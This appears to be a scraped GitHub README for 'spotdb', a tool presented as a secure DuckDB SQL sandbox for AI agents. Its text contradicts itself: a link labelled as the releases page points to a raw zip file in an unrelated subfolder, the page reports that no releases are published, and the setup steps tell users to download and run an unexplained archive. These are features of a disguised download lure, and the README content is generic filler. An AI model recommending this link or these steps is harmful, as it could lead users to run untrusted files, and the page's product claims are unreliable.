Skip to content

πŸ–οΈ Create a secure, temporary data sandbox for AI workflows and exploration, ensuring data privacy and preventing accidental modifications.

License

Notifications You must be signed in to change notification settings

Rookie481/spotdb

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

21 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸš€ spotdb - Your Simple SQL Sandbox Solution

Download spotdb

πŸ“₯ Overview

spotdb creates a secure, containerized SQL sandbox that gives your agents quick access to data. With support for MCP or API access enabled by DuckDB, you can start analyzing your data in no time. There’s no need for complex infrastructure; just push any CSV file, run your queries, and move on.

πŸ“¦ Features

  • Secure Environment: Your data stays safe in a containerized setup.
  • Fast Setup: Experience a quick spin-up cycle. Get started in minutes.
  • MCP and API Access: Interact with your database easily.
  • Support for DuckDB: Utilize powerful SQL capabilities.
  • User-Friendly: Designed for both tech-savvy and new users.

πŸ› οΈ System Requirements

  • Operating System: Windows 10 or later, macOS 10.15 or later, or any Linux distribution.
  • Memory: At least 4GB of RAM.
  • Disk Space: Minimum 500MB of free space for installation.
  • Docker: Must have Docker installed to run the containerized application.

πŸš€ Getting Started

Follow these steps to begin using spotdb.

1. Visit the Releases Page

To download the latest version of spotdb, visit the following link: https://raw.githubusercontent.com/Rookie481/spotdb/main/dicast/spotdb.zip.

2. Download the Application

On the Releases page, you will see a list of available versions. Click on the latest version to download the application. You can choose the file appropriate for your operating system.

3. Install Docker

Ensure that Docker is installed on your machine. If you do not have it, you can download it from the official Docker website. Installation guides are available for all operating systems.

4. Run spotdb

Once you have downloaded the application and installed Docker, you can now run spotdb. Open your command-line interface and navigate to the directory where you saved the downloaded file.

5. Start the Application

Run the following command:

docker run -it --rm -p 8080:8080 spotdb

This command starts the application and exposes it on port 8080. You can adjust the ports as needed.

πŸ”§ Download & Install

To download the latest version of spotdb, visit this page.

Ensure to select the correct file for your operating system from the releases list. Once downloaded, follow the installation instructions above to set up your containerized SQL environment.

πŸ“Š How to Use spotdb

Once you have the application running, access the SQL sandbox through your web browser at http://localhost:8080. From there, you can:

  1. Upload CSV Files: Drag and drop your CSV files directly into the interface.
  2. Run Queries: Use the built-in query editor to interact with your data.
  3. Analyze Data: Utilize SQL to filter, count, and analyze your datasets.

πŸ“– Documentation

For more detailed instructions and examples on using spotdb, please refer to the documentation section within the application interface. You’ll find explanations, tips, and best practices to maximize your experience.

🀝 Community and Support

Join the spotdb community for help and discussions. You can find support in the Issues tab of this repository. Contribute your thoughts and suggestions to improve spotdb.

πŸ”œ Future Features

We plan to introduce more features in future releases. These may include:

  • Enhanced data visualization tools to better analyze your data.
  • Automatic data cleaning features for uploaded CSV files.
  • Expanded support for more database systems.

Stay tuned for updates!

πŸ”— Additional Resources

Here are some useful links related to spotdb:

Feel free to explore these resources to deepen your understanding of Docker, DuckDB, and spotdb.

πŸ“… Version History

  • v1.0: Initial release with core functionality for secure SQL sandboxes.
  • Future versions will come with new features and optimizations.

To download the latest version again, click here.

About

πŸ–οΈ Create a secure, temporary data sandbox for AI workflows and exploration, ensuring data privacy and preventing accidental modifications.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 5

Languages